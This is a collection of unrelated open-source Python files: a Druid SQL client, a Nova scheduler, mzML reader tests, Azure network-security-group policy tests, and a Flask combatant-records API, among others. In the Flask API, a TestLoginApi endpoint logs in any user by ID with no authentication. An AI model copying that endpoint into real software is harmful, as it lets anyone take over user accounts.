urlpatterns = patterns('about.views',
url(r'^$', 'admin_wizard', name='index'),
url(r'^admin_wizard$', 'admin_wizard', name='admin_wizard'),
url(r'^collect_usage$', 'collect_usage', name='collect_usage'),
)
|
2013Commons/HUE-SHARK
|
apps/about/src/about/urls.py
|
Python
|
apache-2.0
| 1,059
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import namedtuple, OrderedDict
import itertools
import json
from six import string_types
from six.moves.urllib import parse
import requests
from pydruid.db import exceptions
class Type(object):
STRING = 1
NUMBER = 2
BOOLEAN = 3
def connect(
host="localhost",
port=8082,
path="/druid/v2/sql/",
scheme="http",
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
ssl_client_cert=None,
proxies=None,
): # noqa: E125
"""
Constructor for creating a connection to the database.
>>> conn = connect('localhost', 8082)
>>> curs = conn.cursor()
"""
context = context or {}
return Connection(
host,
port,
path,
scheme,
user,
password,
context,
header,
ssl_verify_cert,
ssl_client_cert,
proxies,
)
def check_closed(f):
"""Decorator that checks if connection/cursor is closed."""
def g(self, *args, **kwargs):
if self.closed:
raise exceptions.Error(
"{klass} already closed".format(klass=self.__class__.__name__)
)
return f(self, *args, **kwargs)
return g
def check_result(f):
"""Decorator that checks if the cursor has results from `execute`."""
def g(self, *args, **kwargs):
if self._results is None:
raise exceptions.Error("Called before `execute`")
return f(self, *args, **kwargs)
return g
def get_description_from_row(row):
"""
Return description from a single row.
We only return the name, type (inferred from the data) and if the values
can be NULL. String columns in Druid are NULLable. Numeric columns are NOT
NULL.
"""
return [
(
name, # name
get_type(value), # type_code
None, # [display_size]
None, # [internal_size]
None, # [precision]
None, # [scale]
get_type(value) == Type.STRING, # [null_ok]
)
for name, value in row.items()
]
def get_type(value):
"""
Infer type from value.
Note that bool is a subclass of int so order of statements matter.
"""
if isinstance(value, string_types) or value is None:
return Type.STRING
elif isinstance(value, bool):
return Type.BOOLEAN
elif isinstance(value, (int, float)):
return Type.NUMBER
raise exceptions.Error("Value of unknown type: {value}".format(value=value))
class Connection(object):
"""Connection to a Druid database."""
def __init__(
self,
host="localhost",
port=8082,
path="/druid/v2/sql/",
scheme="http",
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
ssl_client_cert=None,
proxies=None,
):
netloc = "{host}:{port}".format(host=host, port=port)
self.url = parse.urlunparse((scheme, netloc, path, None, None, None))
self.context = context or {}
self.closed = False
self.cursors = []
self.header = header
self.user = user
self.password = password
self.ssl_verify_cert = ssl_verify_cert
self.ssl_client_cert = ssl_client_cert
self.proxies = proxies
@check_closed
def close(self):
"""Close the connection now."""
self.closed = True
for cursor in self.cursors:
try:
cursor.close()
except exceptions.Error:
pass # already closed
@check_closed
def commit(self):
"""
Commit any pending transaction to the database.
Not supported.
"""
pass
@check_closed
def cursor(self):
"""Return a new Cursor Object using the connection."""
cursor = Cursor(
self.url,
self.user,
self.password,
self.context,
self.header,
self.ssl_verify_cert,
self.ssl_client_cert,
self.proxies,
)
self.cursors.append(cursor)
return cursor
@check_closed
def execute(self, operation, parameters=None):
cursor = self.cursor()
return cursor.execute(operation, parameters)
def __enter__(self):
return self.cursor()
def __exit__(self, *exc):
self.close()
class Cursor(object):
"""Connection cursor."""
def __init__(
self,
url,
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
proxies=None,
ssl_client_cert=None,
):
self.url = url
self.context = context or {}
self.header = header
self.user = user
self.password = password
self.ssl_verify_cert = ssl_verify_cert
self.ssl_client_cert = ssl_client_cert
self.proxies = proxies
# This read/write attribute specifies the number of rows to fetch at a
# time with .fetchmany(). It defaults to 1 meaning to fetch a single
# row at a time.
self.arraysize = 1
self.closed = False
# this is updated only after a query
self.description = None
# this is set to an iterator after a successfull query
self._results = None
@property
@check_result
@check_closed
def rowcount(self):
# consume the iterator
results = list(self._results)
n = len(results)
self._results = iter(results)
return n
@check_closed
def close(self):
"""Close the cursor."""
self.closed = True
@check_closed
def execute(self, operation, parameters=None):
query = apply_parameters(operation, parameters)
results = self._stream_query(query)
# `_stream_query` returns a generator that produces the rows; we need to
# consume the first row so that `description` is properly set, so let's
# consume it and insert it back if it is not the header.
try:
first_row = next(results)
self._results = (
results if self.header else itertools.chain([first_row], results)
)
except StopIteration:
self._results = iter([])
return self
@check_closed
def executemany(self, operation, seq_of_parameters=None):
raise exceptions.NotSupportedError(
"`executemany` is not supported, use `execute` instead"
)
@check_result
@check_closed
def fetchone(self):
"""
Fetch the next row of a query result set, returning a single sequence,
or `None` when no more data is available.
"""
try:
return self.next()
except StopIteration:
return None
@check_result
@check_closed
def fetchmany(self, size=None):
"""
Fetch the next set of rows of a query result, returning a sequence of
sequences (e.g. a list of tuples). An empty sequence is returned when
no more rows are available.
"""
size = size or self.arraysize
return list(itertools.islice(self._results, size))
@check_result
@check_closed
def fetchall(self):
"""
Fetch all (remaining) rows of a query result, returning them as a
sequence of sequences (e.g. a list of tuples). Note that the cursor's
arraysize attribute can affect the performance of this operation.
"""
return list(self._results)
@check_closed
def setinputsizes(self, sizes):
# not supported
pass
@check_closed
def setoutputsizes(self, sizes):
# not supported
pass
@check_closed
def __iter__(self):
return self
@check_closed
def __next__(self):
return next(self._results)
next = __next__
def _stream_query(self, query):
"""
Stream rows from a query.
This method will yield rows as the data is returned in chunks from the
server.
"""
self.description = None
headers = {"Content-Type": "application/json"}
payload = {"query": query, "context": self.context, "header": self.header}
auth = (
requests.auth.HTTPBasicAuth(self.user, self.password) if self.user else None
)
r = requests.post(
self.url,
stream=True,
headers=headers,
json=payload,
auth=auth,
verify=self.ssl_verify_cert,
cert=self.ssl_client_cert,
proxies=self.proxies,
)
if r.encoding is None:
r.encoding = "utf-8"
# raise any error messages
if r.status_code != 200:
try:
payload = r.json()
except Exception:
payload = {
"error": "Unknown error",
"errorClass": "Unknown",
"errorMessage": r.text,
}
msg = "{error} ({errorClass}): {errorMessage}".format(**payload)
raise exceptions.ProgrammingError(msg)
# Druid will stream the data in chunks of 8k bytes, splitting the JSON
# between them; setting `chunk_size` to `None` makes it use the server
# size
chunks = r.iter_content(chunk_size=None, decode_unicode=True)
Row = None
for row in rows_from_chunks(chunks):
# update description
if self.description is None:
self.description = (
list(row.items()) if self.header else get_description_from_row(row)
)
# return row in namedtuple
if Row is None:
Row = namedtuple("Row", row.keys(), rename=True)
yield Row(*row.values())
def rows_from_chunks(chunks):
"""
A generator that yields rows from JSON chunks.
Druid will return the data in chunks, but they are not aligned with the
JSON objects. This function will parse all complete rows inside each chunk,
yielding them as soon as possible.
"""
body = ""
for chunk in chunks:
if chunk:
body = "".join((body, chunk))
# find last complete row
boundary = 0
brackets = 0
in_string = False
for i, char in enumerate(body):
if char == '"':
if not in_string:
in_string = True
elif body[i - 1] != "\\":
in_string = False
if in_string:
continue
if char == "{":
brackets += 1
elif char == "}":
brackets -= 1
if brackets == 0 and i > boundary:
boundary = i + 1
rows = body[:boundary].lstrip("[,")
body = body[boundary:]
for row in json.loads(
"[{rows}]".format(rows=rows), object_pairs_hook=OrderedDict
):
yield row
def apply_parameters(operation, parameters):
if not parameters:
return operation
escaped_parameters = {key: escape(value) for key, value in parameters.items()}
return operation % escaped_parameters
def escape(value):
"""
Escape the parameter value.
Note that bool is a subclass of int so order of statements matter.
"""
if value == "*":
return value
elif isinstance(value, string_types):
return "'{}'".format(value.replace("'", "''"))
elif isinstance(value, bool):
return "TRUE" if value else "FALSE"
elif isinstance(value, (int, float)):
return value
elif isinstance(value, (list, tuple)):
return ", ".join(escape(element) for element in value)
|
kawamon/hue
|
desktop/core/ext-py/pydruid-0.5.11/pydruid/db/api.py
|
Python
|
apache-2.0
| 12,084
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Simple Scheduler
"""
from nova import db
from nova import flags
from nova import utils
from nova.scheduler import driver
from nova.scheduler import chance
FLAGS = flags.FLAGS
flags.DEFINE_integer("max_cores", 16,
"maximum number of instance cores to allow per host")
flags.DEFINE_integer("max_gigabytes", 10000,
"maximum number of volume gigabytes to allow per host")
flags.DEFINE_integer("max_networks", 1000,
"maximum number of networks to allow per host")
class SimpleScheduler(chance.ChanceScheduler):
"""Implements Naive Scheduler that tries to find least loaded host."""
def _schedule_instance(self, context, instance_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest running instances."""
instance_ref = db.instance_get(context, instance_id)
if (instance_ref['availability_zone']
and ':' in instance_ref['availability_zone']
and context.is_admin):
zone, _x, host = instance_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-compute')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s is not alive") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.instance_update(context, instance_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_compute_sorted(context)
for result in results:
(service, instance_cores) = result
if instance_cores + instance_ref['vcpus'] > FLAGS.max_cores:
raise driver.NoValidHost(_("All hosts have too many cores"))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.instance_update(context,
instance_id,
{'host': service['host'],
'scheduled_at': now})
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_run_instance(self, context, instance_id, *_args, **_kwargs):
return self._schedule_instance(context, instance_id, *_args, **_kwargs)
def schedule_start_instance(self, context, instance_id, *_args, **_kwargs):
return self._schedule_instance(context, instance_id, *_args, **_kwargs)
def schedule_create_volume(self, context, volume_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest volumes."""
volume_ref = db.volume_get(context, volume_id)
if (volume_ref['availability_zone']
and ':' in volume_ref['availability_zone']
and context.is_admin):
zone, _x, host = volume_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-volume')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s not available") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.volume_update(context, volume_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_volume_sorted(context)
for result in results:
(service, volume_gigabytes) = result
if volume_gigabytes + volume_ref['size'] > FLAGS.max_gigabytes:
raise driver.NoValidHost(_("All hosts have too many "
"gigabytes"))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.volume_update(context,
volume_id,
{'host': service['host'],
'scheduled_at': now})
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_set_network_host(self, context, *_args, **_kwargs):
"""Picks a host that is up and has the fewest networks."""
results = db.service_get_all_network_sorted(context)
for result in results:
(service, instance_count) = result
if instance_count >= FLAGS.max_networks:
raise driver.NoValidHost(_("All hosts have too many networks"))
if self.service_is_up(service):
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
|
nii-cloud/dodai-compute
|
nova/scheduler/simple.py
|
Python
|
apache-2.0
| 6,448
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Part of pymzml test cases
"""
import os
import pymzml.run as run
import unittest
from pymzml.spec import Spectrum, Chromatogram
import test_file_paths
class runTest(unittest.TestCase):
"""
"""
def setUp(self):
"""
"""
self.paths = test_file_paths.paths
file_compressed_indexed = self.paths[2]
file_compressed_unindexed = self.paths[1]
file_uncompressed_indexed = self.paths[0]
file_uncompressed_unindexed = self.paths[0]
file_bad_obo_version = self.paths[10]
file_no_obo_version = self.paths[11]
self.reader_compressed_indexed = run.Reader(file_compressed_indexed)
self.reader_compressed_unindexed = run.Reader(file_compressed_unindexed)
self.reader_uncompressed_indexed = run.Reader(file_uncompressed_indexed)
self.reader_uncompressed_unindexed = run.Reader(file_uncompressed_unindexed)
self.reader_bad_obo_version = run.Reader(file_bad_obo_version)
self.reader_set_obo_version = run.Reader(
file_bad_obo_version, obo_version="3.25.0"
)
self.reader_set_year_obo_version = run.Reader(
file_uncompressed_indexed, obo_version="23:06:2017"
)
self.reader_set_bad_obo_version = run.Reader(
file_uncompressed_indexed, obo_version="bad_obo_version"
)
self.reader_set_no_obo_version = run.Reader(file_no_obo_version)
def test_with_context(self):
with run.Reader(self.paths[0]) as reader:
reader[2]
def test_determine_file_encoding(self):
"""
"""
encoding = self.reader_compressed_indexed._determine_file_encoding(
self.paths[2]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_compressed_unindexed._determine_file_encoding(
self.paths[1]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_uncompressed_indexed._determine_file_encoding(
self.paths[3]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_uncompressed_unindexed._determine_file_encoding(
self.paths[0]
)
self.assertEqual(encoding, "ISO-8859-1")
def test_init_iter(self):
"""
"""
mzml_version = self.reader_compressed_indexed.info["mzml_version"]
obo_version = self.reader_compressed_indexed.info["obo_version"]
spec_count = self.reader_compressed_indexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_compressed_unindexed.info["mzml_version"]
obo_version = self.reader_compressed_unindexed.info["obo_version"]
spec_count = self.reader_compressed_unindexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_uncompressed_indexed.info["mzml_version"]
obo_version = self.reader_uncompressed_indexed.info["obo_version"]
spec_count = self.reader_uncompressed_indexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_uncompressed_unindexed.info["mzml_version"]
obo_version = self.reader_uncompressed_unindexed.info["obo_version"]
spec_count = self.reader_uncompressed_unindexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
start_time = self.reader_uncompressed_unindexed.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_bad_obo_version.info["mzml_version"]
obo_version = self.reader_bad_obo_version.info["obo_version"]
spec_count = self.reader_bad_obo_version.info["spectrum_count"]
run_id = self.reader_bad_obo_version.info["run_id"]
start_time = self.reader_bad_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator 2017 default obo = 4.1.0
self.assertEqual(obo_version, "4.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_obo_version.info["mzml_version"]
obo_version = self.reader_set_obo_version.info["obo_version"]
spec_count = self.reader_set_obo_version.info["spectrum_count"]
run_id = self.reader_set_obo_version.info["run_id"]
start_time = self.reader_set_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
self.assertEqual(obo_version, "3.25.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_year_obo_version.info["mzml_version"]
obo_version = self.reader_set_year_obo_version.info["obo_version"]
spec_count = self.reader_set_year_obo_version.info["spectrum_count"]
run_id = self.reader_set_year_obo_version.info["run_id"]
start_time = self.reader_set_year_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator 2017 default obo = 4.1.0
self.assertEqual(obo_version, "4.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_bad_obo_version.info["mzml_version"]
obo_version = self.reader_set_bad_obo_version.info["obo_version"]
spec_count = self.reader_set_bad_obo_version.info["spectrum_count"]
run_id = self.reader_set_bad_obo_version.info["run_id"]
start_time = self.reader_set_bad_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator set invalid obo = 1.1.0
self.assertEqual(obo_version, "1.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
mzml_version = self.reader_set_no_obo_version.info["mzml_version"]
obo_version = self.reader_set_no_obo_version.info["obo_version"]
spec_count = self.reader_set_no_obo_version.info["spectrum_count"]
run_id = self.reader_set_no_obo_version.info["run_id"]
start_time = self.reader_set_no_obo_version.info["start_time"]
self.assertEqual(mzml_version, "1.1.0")
# run._obo_version_validator set invalid obo = 1.1.0
self.assertEqual(obo_version, "1.1.0")
self.assertIsInstance(spec_count, int)
self.assertEqual(run_id, "exp105-01-ds5562-Pos")
self.assertEqual(start_time, "2013-09-10T10:31:08Z")
def test_next(self):
"""
"""
ret = self.reader_compressed_indexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_compressed_unindexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_uncompressed_indexed.next()
self.assertIsInstance(ret, Spectrum)
ret = self.reader_uncompressed_unindexed.next()
self.assertIsInstance(ret, Spectrum)
def test_get_spec_count(self):
self.assertEqual(self.reader_compressed_indexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_compressed_unindexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_uncompressed_unindexed.get_spectrum_count(), 2918)
self.assertEqual(self.reader_uncompressed_unindexed.get_spectrum_count(), 2918)
def test_chrom_count_chrom_file(self):
reader = run.Reader(self.paths[3])
self.assertEqual(reader.get_chromatogram_count(), 3)
def test_chrom_count_spec_file(self):
reader = run.Reader(self.paths[0])
self.assertEqual(reader.get_chromatogram_count(), None)
def test_readers_remeber_spawned_spectra(self):
"""
Make multiple Readers, spawn 10 spectra each, mix them
and map them back to the reader who spawned them.
"""
pass
if __name__ == "__main__":
unittest.main(verbosity=3)
|
StSchulze/pymzML
|
tests/main_reader_test.py
|
Python
|
mit
| 9,619
|
import _plotly_utils.basevalidators
class ClicktoshowValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="clicktoshow", parent_name="layout.annotation", **kwargs
):
super(ClicktoshowValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "arraydraw"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", [False, "onoff", "onout"]),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/layout/annotation/_clicktoshow.py
|
Python
|
mit
| 555
|
# -*- coding: utf-8 -*-
"""Combatant API endpoints.
This module implements the REST API endpoints for managing combatants.
Currently included are:
CombatantApi: Invoked to create or update combatant records
CombatantListDataTable: Invoked to retrieve a list of combatant data formatted
for DataTables to consume
"""
# standard library imports
# third-party imports
from flask import request, jsonify, current_app
from flask_restful import Resource, fields
# application imports
from emol.decorators import login_required
from emol.models import Combatant
from emol.utility.date import string_to_date
@current_app.api.route('/api/combatant/<string:uuid>')
class CombatantApi(Resource):
"""Endpoint for combatant creation and updates.
Permitted methods: POST, PUT
"""
@classmethod
@login_required
def post(cls, uuid):
"""Create a new combatant.
Delegates incoming combatant data to the Combatant model class
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
if uuid != 'new':
return {'message': 'Illegal POST'}, 400
combatant = Combatant.create(request.json)
return {'uuid': combatant.uuid}, 200
@classmethod
@login_required
def put(cls, uuid):
"""Update an existing combatant.
Delegates incoming combatant data to the Combatant model class. If
valid data is passed and the combatant does not exist, it will be
created as if it were a POST request.
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
combatant.update(request.json)
return {'uuid': combatant.uuid}
@classmethod
@login_required
def delete(cls, uuid):
"""Delete a combatant.
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
current_app.db.session.delete(combatant)
current_app.db.session.commit()
@current_app.api.route('/api/combatant/<string:uuid>/authorization')
class CombatantAuthorizationApi(Resource):
"""Endpoint for managing combatant authorizations
Permitted methods: POST, DELETE
"""
@classmethod
@login_required
def post(cls, uuid):
"""Add an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline, create=True)
if card is None:
return
slug = request.json.get('slug')
card.add_authorization(slug)
@classmethod
@login_required
def delete(cls, uuid):
"""Remove an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline)
if card is None:
return
slug = request.json.get('slug')
card.remove_authorization(slug)
@current_app.api.route('/api/combatant/<string:uuid>/warrant')
class CombatantWarrantApi(Resource):
"""Endpoint for managing combatant warrants
Permitted methods: POST, DELETE
"""
@classmethod
@login_required
def post(cls, uuid):
"""Add a warrant
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline, create=True)
if card is None:
return
slug = request.json.get('slug')
card.add_warrant(slug)
@classmethod
@login_required
def delete(cls, uuid):
"""Remove an authorization
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card = combatant.get_card(discipline)
if card is None:
return
slug = request.json.get('slug')
card.remove_warrant(slug)
@current_app.api.route('/api/combatant-list-datatable')
class CombatantListDataTable(Resource):
"""Endpoint for the combatant DataTable.
Permitted methods: GET
"""
@classmethod
@login_required
def get(cls):
"""Retrieve combatant data for DataTables.
Create a list of combatant data including:
Legal Name
SCA Name
Card ID
Privacy policy accepted (boolean)
Combatant UUID
Returns:
The list, JSON encoded
"""
combatants = {'data': [
dict(
legal_name=c.decrypted.get('legal_name'),
sca_name=c.sca_name,
card_id=c.card_id,
accepted_privacy_policy=c.accepted_privacy_policy,
uuid=c.uuid
) for c in Combatant.query.all()
]}
return jsonify(combatants)
@current_app.api.route('/api/test-login/<string:user>')
class TestLoginApi(Resource):
"""
Permitted methods: POST
"""
@classmethod
def post(cls, user):
"""Create a new combatant.
Delegates incoming combatant data to the Combatant model class
See Combatant.create_or_update for the JSON object specification
Returns:
200 if all is well
400 if any error occurred
"""
from flask_login import login_user
from emol.models import User
user = User.query.filter(User.id == user).one()
login_user(user)
@current_app.api.route('/api/combatant/<string:uuid>/card-date')
class CombatantCardDateApi(Resource):
"""Endpoint for managing combatant card dates
Permitted methods: POST
"""
@classmethod
@login_required
def post(cls, uuid):
"""Renew a combatant's card for the given date.
Args:
uuid: The combatant's UUID
Returns:
200 if all is well
400 if any error occurred
"""
combatant = Combatant.get_by_uuid(uuid)
discipline = request.json.get('discipline')
card_date = request.json.get('card_date')
card = combatant.get_card(discipline, create=True)
if card is None:
return
card.renew(string_to_date(card_date))
|
lrt512/emol
|
emol/emol/api/combatant_api.py
|
Python
|
mit
| 6,847
|
# Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from azure_common import BaseTest, arm_template
class NetworkSecurityGroupTest(BaseTest):
def setUp(self):
super(NetworkSecurityGroupTest, self).setUp()
def test_network_security_group_schema_validate(self):
with self.sign_out_patch():
p = self.load_policy({
'name': 'test-azure-network-security-group',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'ingress',
'ports': '80',
'access': 'Allow'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'TCP',
'access': 'Allow'}
],
'actions': [
{'type': 'open',
'ports': '1000-1100',
'direction': 'Inbound'},
{'type': 'close',
'ports': '1000-1100',
'direction': 'Inbound'},
]
}, validate=True)
self.assertTrue(p)
@arm_template('networksecuritygroup.json')
def test_find_by_name(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_single_port(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '80',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_multiple_ports(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '80,8080-8084,88-90',
'match': 'all',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_allow_ports_range_any(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '40-100',
'match': 'any',
'access': 'Allow'}]
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_deny_port(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '8086',
'access': 'Deny'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('networksecuritygroup.json')
def test_egress_policy_protocols(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'TCP',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'egress',
'ports': '22',
'ipProtocol': 'UDP',
'access': 'Allow'}],
})
resources = p.run()
self.assertEqual(len(resources), 0)
@arm_template('networksecuritygroup.json')
def test_open_ports(self):
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
],
'actions': [
{
'type': 'open',
'ports': '1000-1100',
'direction': 'Inbound'}
]
})
resources = p.run()
self.assertEqual(len(resources), 1)
p = self.load_policy({
'name': 'test-azure-nsg',
'resource': 'azure.networksecuritygroup',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'eq',
'value_type': 'normalize',
'value': 'c7n-nsg'},
{'type': 'ingress',
'ports': '1000-1100',
'match': 'any',
'access': 'Deny'}]
})
resources = p.run()
self.assertEqual(len(resources), 0)
|
FireballDWF/cloud-custodian
|
tools/c7n_azure/tests/test_networksecuritygroup.py
|
Python
|
apache-2.0
| 7,188
|
# region Description
"""
dhcpv6_server.py: DHCPv6 server (dhcpv6_server)
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from raw_packet.Utils.base import Base
from raw_packet.Utils.utils import Utils
from raw_packet.Utils.tm import ThreadManager
from raw_packet.Utils.network import RawSniff, RawSend, RawEthernet, RawICMPv6, RawDHCPv6
from typing import Union, Dict, Any
from random import randint
from time import sleep
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
